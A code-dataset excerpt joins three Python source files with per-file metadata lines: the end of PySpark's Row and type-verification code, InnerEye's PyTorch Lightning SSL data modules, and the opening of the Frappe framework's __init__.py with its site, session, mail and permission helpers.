            raise ValueError("object of ByteType out of range, got: %s" % obj)
    elif isinstance(dataType, ShortType):
        if obj < -32768 or obj > 32767:
            raise ValueError("object of ShortType out of range, got: %s" % obj)
    elif isinstance(dataType, IntegerType):
        if obj < -2147483648 or obj > 2147483647:
            raise ValueError("object of IntegerType out of range, got: %s" % obj)
    elif isinstance(dataType, ArrayType):
        for i in obj:
            _verify_type(i, dataType.elementType, dataType.containsNull)
    elif isinstance(dataType, MapType):
        for k, v in obj.items():
            # Map keys are never nullable.
            _verify_type(k, dataType.keyType, False)
            _verify_type(v, dataType.valueType, dataType.valueContainsNull)
    elif isinstance(dataType, StructType):
        if isinstance(obj, dict):
            for f in dataType.fields:
                _verify_type(obj.get(f.name), f.dataType, f.nullable)
        elif isinstance(obj, Row) and getattr(obj, "__from_dict__", False):
            # the order in obj could be different than dataType.fields
            for f in dataType.fields:
                _verify_type(obj[f.name], f.dataType, f.nullable)
        elif isinstance(obj, (tuple, list)):
            if len(obj) != len(dataType.fields):
                raise ValueError("Length of object (%d) does not match with "
                                 "length of fields (%d)" % (len(obj), len(dataType.fields)))
            for v, f in zip(obj, dataType.fields):
                _verify_type(v, f.dataType, f.nullable)
        elif hasattr(obj, "__dict__"):
            d = obj.__dict__
            for f in dataType.fields:
                _verify_type(d.get(f.name), f.dataType, f.nullable)
        else:
            raise TypeError("StructType can not accept object %r in type %s" % (obj, type(obj)))
# This is used to unpickle a Row from JVM
def _create_row_inbound_converter(dataType):
return lambda *a: dataType.fromInternal(a)
def _create_row(fields, values):
    """Build a :class:`Row` from positional values and attach the field names."""
    new_row = Row(*values)
    new_row.__fields__ = fields
    return new_row
class Row(tuple):
    """
    A row in L{DataFrame}.
    The fields in it can be accessed:

    * like attributes (``row.key``)
    * like dictionary values (``row[key]``)

    ``key in row`` will search through row keys.

    Row can be used to create a row object by using named arguments,
    the fields will be sorted by names.

    >>> row = Row(name="Alice", age=11)
    >>> row
    Row(age=11, name='Alice')
    >>> row['name'], row['age']
    ('Alice', 11)
    >>> row.name, row.age
    ('Alice', 11)
    >>> 'name' in row
    True
    >>> 'wrong_key' in row
    False

    Row also can be used to create another Row like class, then it
    could be used to create Row objects, such as

    >>> Person = Row("name", "age")
    >>> Person
    <Row(name, age)>
    >>> 'name' in Person
    True
    >>> 'wrong_key' in Person
    False
    >>> Person("Alice", 11)
    Row(name='Alice', age=11)
    """
    def __new__(self, *args, **kwargs):
        # kwargs build a concrete row (fields sorted by name); positional args
        # build either a "row class" of field names or a plain value tuple.
        if args and kwargs:
            raise ValueError("Can not use both args "
                             "and kwargs to create Row")
        if kwargs:
            # create row objects
            names = sorted(kwargs.keys())
            row = tuple.__new__(self, [kwargs[n] for n in names])
            row.__fields__ = names
            row.__from_dict__ = True
            return row
        else:
            # create row class or objects
            return tuple.__new__(self, args)
    def asDict(self, recursive=False):
        """
        Return as an dict

        :param recursive: turns the nested Row as dict (default: False).

        >>> Row(name="Alice", age=11).asDict() == {'name': 'Alice', 'age': 11}
        True
        >>> row = Row(key=1, value=Row(name='a', age=2))
        >>> row.asDict() == {'key': 1, 'value': Row(age=2, name='a')}
        True
        >>> row.asDict(True) == {'key': 1, 'value': {'name': 'a', 'age': 2}}
        True
        """
        if not hasattr(self, "__fields__"):
            raise TypeError("Cannot convert a Row class into dict")
        if recursive:
            def conv(obj):
                # Recursively turn nested Rows/lists/dicts into plain values.
                if isinstance(obj, Row):
                    return obj.asDict(True)
                elif isinstance(obj, list):
                    return [conv(o) for o in obj]
                elif isinstance(obj, dict):
                    return dict((k, conv(v)) for k, v in obj.items())
                else:
                    return obj
            return dict(zip(self.__fields__, (conv(o) for o in self)))
        else:
            return dict(zip(self.__fields__, self))
    def __contains__(self, item):
        # Membership tests field names (not values) when names are known.
        if hasattr(self, "__fields__"):
            return item in self.__fields__
        else:
            return super(Row, self).__contains__(item)
    # let object acts like class
    def __call__(self, *args):
        """create new Row object"""
        return _create_row(self, args)
    def __getitem__(self, item):
        if isinstance(item, (int, slice)):
            return super(Row, self).__getitem__(item)
        try:
            # it will be slow when it has many fields,
            # but this will not be used in normal cases
            idx = self.__fields__.index(item)
            return super(Row, self).__getitem__(idx)
        except IndexError:
            raise KeyError(item)
        except ValueError:
            raise ValueError(item)
    def __getattr__(self, item):
        # Fail fast on dunder lookups so copy/pickle protocols work.
        if item.startswith("__"):
            raise AttributeError(item)
        try:
            # it will be slow when it has many fields,
            # but this will not be used in normal cases
            idx = self.__fields__.index(item)
            return self[idx]
        except IndexError:
            raise AttributeError(item)
        except ValueError:
            raise AttributeError(item)
    def __setattr__(self, key, value):
        # Rows are read-only except for the two bookkeeping attributes.
        if key != '__fields__' and key != "__from_dict__":
            raise Exception("Row is read-only")
        self.__dict__[key] = value
    def __reduce__(self):
        """Returns a tuple so Python knows how to pickle Row."""
        if hasattr(self, "__fields__"):
            return (_create_row, (self.__fields__, tuple(self)))
        else:
            return tuple.__reduce__(self)
    def __repr__(self):
        """Printable representation of Row used in Python REPL."""
        if hasattr(self, "__fields__"):
            return "Row(%s)" % ", ".join("%s=%r" % (k, v)
                                         for k, v in zip(self.__fields__, tuple(self)))
        else:
            return "<Row(%s)>" % ", ".join(self)
class DateConverter(object):
    """Py4J input converter mapping ``datetime.date`` to ``java.sql.Date``."""
    def can_convert(self, obj):
        """Return True when *obj* is a datetime.date (including subclasses)."""
        return isinstance(obj, datetime.date)
    def convert(self, obj, gateway_client):
        """Build a java.sql.Date from the ISO ``yyyy-MM-dd`` rendering of *obj*."""
        jdate_cls = JavaClass("java.sql.Date", gateway_client)
        return jdate_cls.valueOf(obj.strftime("%Y-%m-%d"))
class DatetimeConverter(object):
    """Py4J input converter mapping ``datetime.datetime`` to ``java.sql.Timestamp``."""
    def can_convert(self, obj):
        """Return True when *obj* is a datetime.datetime (including subclasses)."""
        return isinstance(obj, datetime.datetime)
    def convert(self, obj, gateway_client):
        """Build a java.sql.Timestamp from *obj*, preserving microseconds."""
        ts_cls = JavaClass("java.sql.Timestamp", gateway_client)
        if obj.tzinfo:
            # Aware datetime: epoch seconds from the UTC time tuple.
            seconds = calendar.timegm(obj.utctimetuple())
        else:
            # Naive datetime: interpreted in the local timezone.
            seconds = time.mktime(obj.timetuple())
        ts = ts_cls(int(seconds) * 1000)
        ts.setNanos(obj.microsecond * 1000)
        return ts
# datetime is a subclass of date, we should register DatetimeConverter first
# so that Py4J tries the more specific converter before the generic date one.
register_input_converter(DatetimeConverter())
register_input_converter(DateConverter())
def _test():
    """Run this module's doctests against a local Spark deployment.

    Creates a local SparkContext/SparkSession, injects them into the doctest
    globals as ``sc``/``spark``, and exits the process with a non-zero status
    if any doctest fails.
    """
    import doctest
    import sys
    from pyspark.context import SparkContext
    from pyspark.sql import SparkSession
    globs = globals()
    sc = SparkContext('local[4]', 'PythonTest')
    globs['sc'] = sc
    globs['spark'] = SparkSession.builder.getOrCreate()
    try:
        (failure_count, test_count) = doctest.testmod(
            globs=globs, optionflags=doctest.ELLIPSIS)
    finally:
        # Always release the local SparkContext, even if doctest raises.
        globs['sc'].stop()
    if failure_count:
        # sys.exit is always available; the bare exit() builtin is injected
        # by the `site` module and may be absent (e.g. under `python -S`).
        sys.exit(-1)
if __name__ == "__main__":
    _test()
| 32.991066
| 100
| 0.601969
|
4a023203b1db83849a80d4503a77e6a191933bcf
| 8,032
|
py
|
Python
|
InnerEye/ML/SSL/datamodules_and_datasets/datamodules.py
|
microsoft/InnerEye-DeepLearning
|
6a4d334a996b69269d959d946e4d24a5ee2e9f55
|
[
"MIT"
] | 402
|
2020-09-22T16:38:16.000Z
|
2022-03-30T09:56:03.000Z
|
InnerEye/ML/SSL/datamodules_and_datasets/datamodules.py
|
wensincai/InnerEye-DeepLearning
|
ccb53d01ad0f1c20336588c0066059b8de5266fd
|
[
"MIT"
] | 259
|
2020-09-23T09:32:33.000Z
|
2022-03-30T18:15:01.000Z
|
InnerEye/ML/SSL/datamodules_and_datasets/datamodules.py
|
wensincai/InnerEye-DeepLearning
|
ccb53d01ad0f1c20336588c0066059b8de5266fd
|
[
"MIT"
] | 112
|
2020-09-23T00:12:58.000Z
|
2022-03-31T07:39:55.000Z
|
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
import logging
import os
from typing import Any, Callable, Dict, Optional, Union
import numpy as np
import torch
from pl_bolts.datamodules.vision_datamodule import VisionDataModule
from pytorch_lightning import LightningDataModule
from pytorch_lightning.trainer.supporters import CombinedLoader
from torch.utils.data import DataLoader, Dataset
from InnerEye.ML.SSL.utils import SSLDataModuleType
class InnerEyeVisionDataModule(VisionDataModule):
    """Loads a torchvision-style dataset class into a pytorch-lightning data module,
    optionally returning sample indices and computing class weights."""
    def __init__(self,
                 dataset_cls: type,
                 return_index: bool,
                 train_transforms: Optional[Callable],
                 val_transforms: Optional[Callable],
                 data_dir: Optional[str] = None,
                 val_split: Union[int, float] = 0.2,
                 num_workers: int = 6,
                 batch_size: int = 32,
                 seed: int = 42,
                 drop_last: bool = True,
                 *args: Any, **kwargs: Any) -> None:
        """
        Wrapper around VisionDatamodule to load torchvision dataset into a pytorch-lightning module.
        :param dataset_cls: class to load the dataset. Expected to inherit from InnerEyeDataClassBaseWithReturnIndex and
        VisionDataset. See InnerEyeCIFAR10 for an example.
        BEWARE VisionDataModule expects the first positional argument of your class to be the data directory.
        :param return_index: whether the return the index in __get_item__, the dataset_cls is expected to implement
        this logic.
        :param train_transforms: transforms to use at training time
        :param val_transforms: transforms to use at validation time
        :param data_dir: data directory where to find the data
        :param val_split: proportion of training dataset to use for validation
        :param num_workers: number of processes for dataloaders
        :param batch_size: batch size for training & validation
        :param seed: random seed for dataset splitting
        :param drop_last: bool, if true it drops the last incomplete batch
        """
        # Default to the current working directory when no data_dir is given.
        data_dir = data_dir if data_dir is not None else os.getcwd()
        super().__init__(data_dir=data_dir,
                         val_split=val_split,
                         num_workers=num_workers,
                         batch_size=batch_size,
                         drop_last=drop_last,
                         train_transforms=train_transforms,
                         val_transforms=val_transforms,
                         seed=seed,
                         *args,
                         **kwargs)
        self.dataset_cls = dataset_cls
        self.class_weights: Optional[torch.Tensor] = None
        # In setup() VisionDataModule expects the extra arguments to be passed to the dataset class init
        # via the self.EXTRA_ARGS attribute
        self.EXTRA_ARGS = {"return_index": return_index}
    def prepare_data(self) -> None:
        """
        Initializes the dataset class, and in the case of CIFAR dataset, optionally downloads the data from URL to
        local data_dir.
        """
        # Instantiate once per split; datasets like CIFAR download on first use.
        self.dataset_cls(self.data_dir, train=True, download=True, **self.EXTRA_ARGS)
        self.dataset_cls(self.data_dir, train=False, download=True, **self.EXTRA_ARGS)
    def _split_dataset(self, dataset: Dataset, train: bool = True) -> Dataset:
        """
        Splits the dataset into train and validation set
        """
        if hasattr(dataset, "_split_dataset"):
            # If the dataset implements a more complex logic than just splitting randomly by index.
            # The dataset class can implements its own _split_dataset function.
            dataset_train, dataset_val = dataset._split_dataset(val_split=self.val_split,  # type: ignore
                                                                seed=self.seed)
            return dataset_train if train else dataset_val
        else:
            return super()._split_dataset(dataset, train)
    def compute_class_weights(self) -> Optional[torch.Tensor]:
        """Return inverse-frequency class weights (normalized to sum to 1) when
        the training dataset exposes a ``targets`` attribute, else None."""
        dataset = self.dataset_train.dataset
        class_weights = None
        if hasattr(dataset, "targets"):
            # Inverse frequency: rarer classes get larger weights.
            class_weights = len(dataset.targets) / np.bincount(dataset.targets)
            # Normalized class weights
            class_weights /= class_weights.sum()
            class_weights = torch.tensor(class_weights, dtype=torch.float32)
        return class_weights
class CombinedDataModule(LightningDataModule):
    """Pairs an SSL-encoder datamodule with a linear-head datamodule so both can
    be iterated together; batches are dicts keyed by SSLDataModuleType."""
    def __init__(self,
                 encoder_module: InnerEyeVisionDataModule,
                 linear_head_module: InnerEyeVisionDataModule,
                 use_balanced_loss_linear_head: bool,
                 *args: Any,
                 **kwargs: Any) -> None:
        """
        Combined data module to use different datamodules for training SSL encoder and finetuning the linear head.
        Each batch returned by this data module, will be a dictionary of type Dict[SSLDataModuleType, Any]. If one
        dataloader is shorter than the other, combined dataloader will start looping again from the start of the shorter
        one until we looped through the longest one.
        :param encoder_module: datamodule to use for training of SSL.
        :param linear_head_module: datamodule to use for training of linear head on top of frozen encoder. Can use a
        different batch size than the encoder module. CombinedDataModule logic will take care of aggregation.
        """
        super().__init__(*args, **kwargs)
        self.encoder_module = encoder_module
        self.linear_head_module = linear_head_module
        self.class_weights = None
        if use_balanced_loss_linear_head:
            # Weights come from the linear-head data (that is the supervised task).
            self.class_weights = self.linear_head_module.compute_class_weights()
        # The encoder's batch size drives the combined loader.
        self.batch_size = self.encoder_module.batch_size
    def prepare_data(self, *args: Any, **kwargs: Any) -> None:
        """
        Saves files to data_dir
        """
        self.encoder_module.prepare_data()
        self.linear_head_module.prepare_data()
        logging.info(f"Len encoder train dataloader {len(self.encoder_module.train_dataloader())}")
        logging.info(f"Len total train dataloader {len(self.train_dataloader())}")
    def train_dataloader(self, *args: Any, **kwargs: Any) -> Dict[SSLDataModuleType, DataLoader]:  # type: ignore
        """
        The train dataloaders
        """
        # This code may be superseded in current versions of PL. Using this dictionary syntax will effectively
        # use a CombinedLoader(dataloaders, mode="max_size_cycle"), similar to what we need to do explicitly for
        # the validation data loader.
        dataloaders = {
            SSLDataModuleType.ENCODER: self.encoder_module.train_dataloader(),
            SSLDataModuleType.LINEAR_HEAD: self.linear_head_module.train_dataloader()}
        return dataloaders
    def val_dataloader(self, *args: Any, **kwargs: Any) -> CombinedLoader:  # type: ignore
        """
        The val dataloader
        """
        # max_size_cycle: the shorter loader is cycled until the longer finishes.
        dataloaders = {
            SSLDataModuleType.ENCODER: self.encoder_module.val_dataloader(),
            SSLDataModuleType.LINEAR_HEAD: self.linear_head_module.val_dataloader()}
        return CombinedLoader(dataloaders, mode="max_size_cycle")
    @property
    def num_samples(self) -> int:
        """
        Returns number of samples in training set
        """
        return len(self.encoder_module.dataset_train)
    @property
    def num_classes(self) -> int:
        # Number of classes of the supervised (linear head) task.
        return self.linear_head_module.dataset_train.dataset.num_classes
    def setup(self, stage: Optional[str] = None) -> None:
        # Forward the Lightning setup call to both wrapped datamodules.
        self.encoder_module.setup(stage)
        self.linear_head_module.setup(stage)
| 46.97076
| 120
| 0.641185
|
4a0232e62453fbabfdf00a3185500c872579341c
| 28,282
|
py
|
Python
|
frappe/__init__.py
|
gangadharkadam/letzfrappe
|
51a2108acddd5ae9c5a58238a2097476a3de1775
|
[
"MIT"
] | null | null | null |
frappe/__init__.py
|
gangadharkadam/letzfrappe
|
51a2108acddd5ae9c5a58238a2097476a3de1775
|
[
"MIT"
] | null | null | null |
frappe/__init__.py
|
gangadharkadam/letzfrappe
|
51a2108acddd5ae9c5a58238a2097476a3de1775
|
[
"MIT"
] | 1
|
2018-03-22T00:24:53.000Z
|
2018-03-22T00:24:53.000Z
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
"""
globals attached to frappe module
+ some utility functions that should probably be moved
"""
from __future__ import unicode_literals
from werkzeug.local import Local, release_local
import os, importlib, inspect, logging, json
# public
from frappe.__version__ import __version__
from .exceptions import *
from .utils.jinja import get_jenv, get_template, render_template
# Thread/greenlet-local storage holding all per-request state (db, session, ...).
local = Local()
class _dict(dict):
"""dict like object that exposes keys as attributes"""
def __getattr__(self, key):
ret = self.get(key)
if not ret and key.startswith("__"):
raise AttributeError()
return ret
def __setattr__(self, key, value):
self[key] = value
def __getstate__(self):
return self
def __setstate__(self, d):
self.update(d)
def update(self, d):
"""update and return self -- the missing dict feature in python"""
super(_dict, self).update(d)
return self
def copy(self):
return _dict(dict(self).copy())
def _(msg):
	"""Returns translated string in current lang, if exists."""
	# English is the source language — nothing to translate.
	if local.lang == "en":
		return msg
	from frappe.translate import get_full_dict
	# Fall back to the untranslated message when no entry exists.
	return get_full_dict(local.lang).get(msg, msg)
def get_lang_dict(fortype, name=None):
	"""Returns the translated language dict for the given type and name.
	:param fortype: must be one of `doctype`, `page`, `report`, `include`, `jsfile`, `boot`
	:param name: name of the document for which assets are to be returned."""
	if local.lang=="en":
		return {}
	from frappe.translate import get_dict
	return get_dict(fortype, name)
def set_user_lang(user, user_language=None):
	"""Guess and set user language for the session. `frappe.local.lang`"""
	# NOTE(review): the `user_language` parameter is accepted but never used
	# here — language is always derived via get_user_lang(user); confirm intent.
	from frappe.translate import get_user_lang
	local.lang = get_user_lang(user)
# local-globals
# Werkzeug proxy objects: module-level names that transparently resolve to
# the attribute of the same name on the per-request `local` object above.
db = local("db")
conf = local("conf")
form = form_dict = local("form_dict")
request = local("request")
request_method = local("request_method")
response = local("response")
session = local("session")
user = local("user")
flags = local("flags")
error_log = local("error_log")
debug_log = local("debug_log")
message_log = local("message_log")
lang = local("lang")
def init(site, sites_path=None):
	"""Initialize frappe for the current site. Reset thread locals `frappe.local`"""
	# Already initialised for this thread/request — nothing to do.
	if getattr(local, "initialised", None):
		return
	if not sites_path:
		sites_path = '.'
	# Per-request log buffers.
	local.error_log = []
	local.message_log = []
	local.debug_log = []
	local.flags = _dict({})
	local.rollback_observers = []
	local.test_objects = {}
	local.site = site
	local.sites_path = sites_path
	local.site_path = os.path.join(sites_path, site)
	local.request_method = request.method if request else None
	local.request_ip = None
	local.response = _dict({"docs":[]})
	# Site configuration and language default.
	local.conf = _dict(get_site_config())
	local.lang = local.conf.lang or "en"
	local.module_app = None
	local.app_modules = None
	local.user = None
	local.role_permissions = {}
	# Jinja environment/loader are built lazily on first use.
	local.jenv = None
	local.jloader =None
	local.cache = {}
	setup_module_map()
	local.initialised = True
def connect(site=None, db_name=None):
	"""Connect to site database instance.
	:param site: If site is given, calls `frappe.init`.
	:param db_name: Optional. Will use from `site_config.json`."""
	from database import Database
	if site:
		init(site)
	local.db = Database(user=db_name or local.conf.db_name)
	local.form_dict = _dict()
	local.session = _dict()
	# Sessions opened via connect() run with full (Administrator) rights.
	set_user("Administrator")
def get_site_config(sites_path=None, site_path=None):
	"""Returns `site_config.json` combined with `sites/common_site_config.json`.
	`site_config` is a set of site wide settings like database name, password, email etc."""
	config = {}
	sites_path = sites_path or getattr(local, "sites_path", None)
	site_path = site_path or getattr(local, "site_path", None)
	# Common (bench-wide) config is loaded first so the site config overrides it.
	if sites_path:
		common_site_config = os.path.join(sites_path, "common_site_config.json")
		if os.path.exists(common_site_config):
			config.update(get_file_json(common_site_config))
	if site_path:
		site_config = os.path.join(site_path, "site_config.json")
		if os.path.exists(site_config):
			config.update(get_file_json(site_config))
	return _dict(config)
def destroy():
	"""Closes connection and releases werkzeug local."""
	if db:
		db.close()
	release_local(local)
# cache connection (singleton per process)
redis_server = None
def cache():
	"""Returns the shared redis connection (created lazily on first call)."""
	global redis_server
	if not redis_server:
		from frappe.utils.redis_wrapper import RedisWrapper
		redis_server = RedisWrapper(conf.get("redis_server") or "localhost")
	return redis_server
def get_traceback():
	"""Returns error traceback."""
	import utils
	return utils.get_traceback()
def errprint(msg):
	"""Log error. This is sent back as `exc` in response.
	:param msg: Message."""
	from utils import cstr
	# Outside a web/API request, also echo to stdout (Python 2 print statement).
	if not request or (not "cmd" in local.form_dict):
		print cstr(msg)
	error_log.append(cstr(msg))
def log(msg):
	"""Add to `debug_log`.
	:param msg: Message."""
	if not request:
		# Console echo only when logging is enabled in site config.
		if conf.get("logging") or False:
			print repr(msg)
	from utils import cstr
	debug_log.append(cstr(msg))
def msgprint(msg, small=0, raise_exception=0, as_table=False):
	"""Print a message to the user (via HTTP response).
	Messages are sent in the `__server_messages` property in the
	response JSON and shown in a pop-up / modal.
	:param msg: Message.
	:param small: [optional] Show as a floating message in the footer.
	:param raise_exception: [optional] Raise given exception and show message.
	:param as_table: [optional] If `msg` is a list of lists, render as HTML table.
	"""
	def _raise_exception():
		# Optionally roll back and raise either the given exception class
		# or the generic ValidationError (Python 2 raise syntax).
		if raise_exception:
			if flags.rollback_on_exception:
				db.rollback()
			import inspect
			if inspect.isclass(raise_exception) and issubclass(raise_exception, Exception):
				raise raise_exception, msg
			else:
				raise ValidationError, msg
	# When messages are muted (e.g. in tests/patches) still honour the exception.
	if flags.mute_messages:
		_raise_exception()
		return
	from utils import cstr
	if as_table and type(msg) in (list, tuple):
		msg = '<table border="1px" style="border-collapse: collapse" cellpadding="2px">' + ''.join(['<tr>'+''.join(['<td>%s</td>' % c for c in r])+'</tr>' for r in msg]) + '</table>'
	if flags.print_messages:
		print "Message: " + repr(msg)
	# "__small:" prefix tells the client to render as a footer toast.
	message_log.append((small and '__small:' or '')+cstr(msg or ''))
	_raise_exception()
def throw(msg, exc=ValidationError):
	"""Throw execption and show message (`msgprint`).
	:param msg: Message.
	:param exc: Exception class. Default `frappe.ValidationError`"""
	msgprint(msg, raise_exception=exc)
def create_folder(path, with_init=False):
	"""Create a folder in the given path and add an `__init__.py` file (optional).
	:param path: Folder path.
	:param with_init: Create `__init__.py` in the new folder."""
	from frappe.utils import touch_file
	if not os.path.exists(path):
		os.makedirs(path)
		if with_init:
			touch_file(os.path.join(path, "__init__.py"))
def set_user(username):
	"""Set current user.
	:param username: **User** name to set as current user."""
	from frappe.utils.user import User
	local.session.user = username
	local.session.sid = username
	# Reset all per-user caches so nothing leaks between users.
	local.cache = {}
	local.form_dict = _dict()
	local.jenv = None
	local.session.data = _dict()
	local.user = User(username)
	local.role_permissions = {}
def get_request_header(key, default=None):
	"""Return HTTP request header.
	:param key: HTTP header key.
	:param default: Default value."""
	return request.headers.get(key, default)
def sendmail(recipients=(), sender="", subject="No Subject", message="No Message",
	as_markdown=False, bulk=False, ref_doctype=None, ref_docname=None,
	add_unsubscribe_link=False, attachments=None, content=None, doctype=None, name=None, reply_to=None):
	"""Send email using user's default **Email Account** or global default **Email Account**.
	:param recipients: List of recipients.
	:param sender: Email sender. Default is current user.
	:param subject: Email Subject.
	:param message: (or `content`) Email Content.
	:param as_markdown: Convert content markdown to HTML.
	:param bulk: Send via scheduled email sender **Bulk Email**. Don't send immediately.
	:param ref_doctype: (or `doctype`) Append as communication to this DocType.
	:param ref_docname: (or `name`) Append as communication to this document name.
	:param add_unsubscribe_link: Allow user to unsubscribe from these emails.
	:param attachments: List of attachments.
	:param reply_to: Reply-To email id.
	"""
	# `content`/`doctype`/`name` are newer aliases that take precedence over
	# `message`/`ref_doctype`/`ref_docname` below.
	if bulk:
		# Queue for the scheduler instead of sending synchronously.
		import frappe.email.bulk
		frappe.email.bulk.send(recipients=recipients, sender=sender,
			subject=subject, message=content or message, ref_doctype = doctype or ref_doctype,
			ref_docname = name or ref_docname, add_unsubscribe_link=add_unsubscribe_link, attachments=attachments,
			reply_to=reply_to)
	else:
		import frappe.email
		if as_markdown:
			frappe.email.sendmail_md(recipients, sender=sender,
				subject=subject, msg=content or message, attachments=attachments, reply_to=reply_to)
		else:
			frappe.email.sendmail(recipients, sender=sender,
				subject=subject, msg=content or message, attachments=attachments, reply_to=reply_to)
logger = None
whitelisted = []
guest_methods = []
def whitelist(allow_guest=False):
	"""
	Decorator for whitelisting a function and making it accessible via HTTP.
	Standard request will be `/api/method/[path.to.method]`
	:param allow_guest: Allow non logged-in user to access this method.
	Use as:
		@frappe.whitelist()
		def myfunc(param1, param2):
			pass
	"""
	def innerfn(fn):
		# Record the function in the module-level registries; guest access
		# is granted only when explicitly requested.
		global whitelisted, guest_methods
		registries = [whitelisted, guest_methods] if allow_guest else [whitelisted]
		for registry in registries:
			registry.append(fn)
		return fn
	return innerfn
def only_for(roles):
	"""Raise `frappe.PermissionError` if the user does not have any of the given **Roles**.
	:param roles: List of roles to check."""
	if not isinstance(roles, (tuple, list)):
		roles = (roles,)
	roles = set(roles)
	myroles = set(get_roles())
	# Any single matching role is enough.
	if not roles.intersection(myroles):
		raise PermissionError
def clear_cache(user=None, doctype=None):
	"""Clear **User**, **DocType** or global cache.
	:param user: If user is given, only user cache is cleared.
	:param doctype: If doctype is given, only DocType cache is cleared."""
	import frappe.sessions
	if doctype:
		import frappe.model.meta
		frappe.model.meta.clear_cache(doctype)
		reset_metadata_version()
	elif user:
		frappe.sessions.clear_cache(user)
	else:	# everything
		import translate
		frappe.sessions.clear_cache()
		translate.clear_cache()
		reset_metadata_version()
		frappe.local.cache = {}
		# Let installed apps clear their own caches via the hook.
		for fn in frappe.get_hooks("clear_cache"):
			get_attr(fn)()
	frappe.local.role_permissions = {}
def get_roles(username=None):
	"""Returns roles of current user."""
	# No session yet (e.g. before login) — treat as Guest.
	if not local.session:
		return ["Guest"]
	return get_user(username).get_roles()
def get_user(username):
	"""Returns `frappe.utils.user.User` instance of given user."""
	from frappe.utils.user import User
	# Reuse the cached User object for the session user.
	if not username or username == local.session.user:
		return local.user
	else:
		return User(username)
def has_permission(doctype, ptype="read", doc=None, user=None):
	"""Raises `frappe.PermissionError` if not permitted.
	:param doctype: DocType for which permission is to be check.
	:param ptype: Permission type (`read`, `write`, `create`, `submit`, `cancel`, `amend`). Default: `read`.
	:param doc: [optional] Checks User permissions for given doc.
	:param user: [optional] Check for given user. Default: current user."""
	import frappe.permissions
	return frappe.permissions.has_permission(doctype, ptype, doc, user=user)
def is_table(doctype):
	"""Returns True if `istable` property (indicating child Table) is set for given DocType."""
	# The list of child-table doctypes is cached; rebuilt on cache miss.
	tables = cache().get_value("is_table")
	if tables==None:
		tables = db.sql_list("select name from tabDocType where ifnull(istable,0)=1")
		cache().set_value("is_table", tables)
	return doctype in tables
def generate_hash(txt=None):
	"""Generates random hash for given text + current timestamp + random string."""
	import hashlib, time
	from .utils import random_string
	# Timestamp + random suffix make the digest unique even for equal txt.
	return hashlib.sha224((txt or "") + repr(time.time()) + repr(random_string(8))).hexdigest()
def reset_metadata_version():
	"""Reset `metadata_version` (Client (Javascript) build ID) hash."""
	v = generate_hash()
	cache().set_value("metadata_version", v)
	return v
def new_doc(doctype, parent_doc=None, parentfield=None):
	"""Returns a new document of the given DocType with defaults set.
	:param doctype: DocType of the new document.
	:param parent_doc: [optional] add to parent document.
	:param parentfield: [optional] add against this `parentfield`."""
	from frappe.model.create_new import get_new_doc
	return get_new_doc(doctype, parent_doc, parentfield)
def set_value(doctype, docname, fieldname, value):
	"""Set document value. Calls `frappe.client.set_value`"""
	import frappe.client
	return frappe.client.set_value(doctype, docname, fieldname, value)
def get_doc(arg1, arg2=None):
	"""Return a `frappe.model.document.Document` object of the given type and name.
	:param arg1: DocType name as string **or** document JSON.
	:param arg2: [optional] Document name as string.
	Examples:
		# insert a new document
		todo = frappe.get_doc({"doctype":"ToDo", "description": "test"})
		todo.insert()
		# open an existing document
		todo = frappe.get_doc("ToDo", "TD0001")
	"""
	import frappe.model.document
	return frappe.model.document.get_doc(arg1, arg2)
def get_meta(doctype, cached=True):
	"""Get `frappe.model.meta.Meta` instance of given doctype name."""
	import frappe.model.meta
	return frappe.model.meta.get_meta(doctype, cached=cached)
def delete_doc(doctype=None, name=None, force=0, ignore_doctypes=None, for_reload=False, ignore_permissions=False):
	"""Delete a document. Calls `frappe.model.delete_doc.delete_doc`.
	:param doctype: DocType of document to be delete.
	:param name: Name of document to be delete.
	:param force: Allow even if document is linked. Warning: This may lead to data integrity errors.
	:param ignore_doctypes: Ignore if child table is one of these.
	:param for_reload: Call `before_reload` trigger before deleting.
	:param ignore_permissions: Ignore user permissions."""
	import frappe.model.delete_doc
	frappe.model.delete_doc.delete_doc(doctype, name, force, ignore_doctypes, for_reload, ignore_permissions)
def delete_doc_if_exists(doctype, name):
	"""Delete document if exists."""
	if db.exists(doctype, name):
		delete_doc(doctype, name)
def reload_doc(module, dt=None, dn=None, force=False):
	"""Reload Document from model (`[module]/[doctype]/[name]/[name].json`) files.
	:param module: Module name.
	:param dt: DocType name.
	:param dn: Document name.
	:param force: Reload even if `modified` timestamp matches.
	"""
	import frappe.modules
	return frappe.modules.reload_doc(module, dt, dn, force=force)
def rename_doc(doctype, old, new, debug=0, force=False, merge=False, ignore_permissions=False):
	"""Rename a document. Calls `frappe.model.rename_doc.rename_doc`"""
	# NOTE(review): the `debug` parameter is accepted but not forwarded — confirm.
	from frappe.model.rename_doc import rename_doc
	return rename_doc(doctype, old, new, force=force, merge=merge, ignore_permissions=ignore_permissions)
def get_module(modulename):
	"""Returns a module object for given Python module name using `importlib.import_module`."""
	return importlib.import_module(modulename)
def scrub(txt):
	"""Returns sluggified string. e.g. `Sales Order` becomes `sales_order`."""
	# Lowercase first, then map both spaces and hyphens to underscores.
	return txt.lower().replace(' ', '_').replace('-', '_')
def unscrub(txt):
	"""Returns titlified string. e.g. `sales_order` becomes `Sales Order`."""
	# Replace separators with spaces, then title-case each word.
	spaced = txt.replace('_', ' ').replace('-', ' ')
	return spaced.title()
def get_module_path(module, *joins):
	"""Get the path of the given module name.
	:param module: Module name.
	:param *joins: Join additional path elements using `os.path.join`."""
	module = scrub(module)
	# module_app maps a scrubbed module name to the app that owns it.
	return get_pymodule_path(local.module_app[module] + "." + module, *joins)
def get_app_path(app_name, *joins):
	"""Return path of given app.
	:param app: App name.
	:param *joins: Join additional path elements using `os.path.join`."""
	return get_pymodule_path(app_name, *joins)
def get_site_path(*joins):
	"""Return path of current site.
	:param *joins: Join additional path elements using `os.path.join`."""
	return os.path.join(local.site_path, *joins)
def get_pymodule_path(modulename, *joins):
	"""Return path of given Python module name.
	:param modulename: Python module name.
	:param *joins: Join additional path elements using `os.path.join`."""
	# Path components are scrubbed too, so "Sales Order" maps to sales_order/.
	joins = [scrub(part) for part in joins]
	return os.path.join(os.path.dirname(get_module(scrub(modulename)).__file__), *joins)
def get_module_list(app_name):
	"""Get list of modules for given all via `app/modules.txt`."""
